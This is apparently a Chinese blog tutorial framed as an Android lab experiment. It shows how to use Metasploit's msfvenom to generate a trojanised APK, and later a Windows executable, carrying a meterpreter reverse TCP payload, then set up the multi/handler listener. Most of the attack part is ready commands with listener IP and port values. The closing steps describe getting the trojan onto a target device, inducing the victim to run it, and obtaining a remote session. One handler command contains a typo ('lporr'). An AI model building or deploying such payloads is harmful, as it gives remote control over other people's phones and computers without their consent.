Metasploit反弹shell.apk实验(Android)

一、环境准备

  1. MSF-Metasploit Framework

  2. 一台安装手机或者模拟器

二、木马生成

  1. 生成一个APK后门

  2. msfvenom -p android/meterpreter/reverse_tcp LHOST={监控IP} LPORT={监控端口} R>k.apk。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.110.38 LPORT=4567 R>k.apk

三、配置监控

  1. 模拟器安装木马文件,通过python或复制传播

  2. 启动msf 终端内输入:msfconsole 启动msf

  3. 载入监控模块 msf中输入: use exploit/multi/handler

  4. 载入payload MSF终端中输入: set payload android/meterpreter/reverse_tcp

  5. 配置payload MSF终端中输入:show options

  6. 配置监控IP MSF中输入:set lhost <监控的IP>

  7. 配置监控端口 MSF中输入:set lporr <监控的端口>

  8. 执行监控 msf终端中输入: run

四、攻击利用

  1. 将木马上传到靶机

  2. 在靶机上执行木马

  3. 完成攻击利用

### 使用 Metasploit 生成反弹 Shell 的 Payload 并执行 #### 创建可执行文件用于反弹 Shell 为了创建能够从目标机器向攻击者发起连接请求的反弹 shell,`msfvenom` 是一个非常有用的工具。通过此命令行工具,可以快速生成多种类型的 payload 文件,适用于不同的操作系统环境。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=your_port -f exe -o /path/to/output/file.exe ``` 上述命令选择了针对 Windows 系统的 Meterpreter 反弹 TCP 连接载荷,并指定了本地监听 IP 地址 (`LHOST`) 和端口 (`LPORT`) 参数,最后保存为 `.exe` 格式的可执行文件[^3]。 #### 设置 Metasploit 控制台中的侦听器 一旦生成了恶意软件样本,在 Metasploit 中配置好相应的 handler 来接收来自受害者的回调至关重要。这可以通过启动 `multi/handler` exploit 模块完成: ```ruby use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your_ip_address set LPORT your_port exploit ``` 这段 Ruby 脚本设置了相同的参数以匹配之前生成的有效负载设置,确保当受害者运行带有嵌入式 payload 的应用程序时能成功建立通信通道[^2]。 #### 执行与验证 将生成好的 executable 发送到目标计算机上并诱导其运行;与此同时保持 Metasploit 终端处于开启状态等待连接到来。如果一切顺利的话,不久之后就会看到一个新的 session 建立起来,意味着获得了远程访问权限[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

快乐的小猪v

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值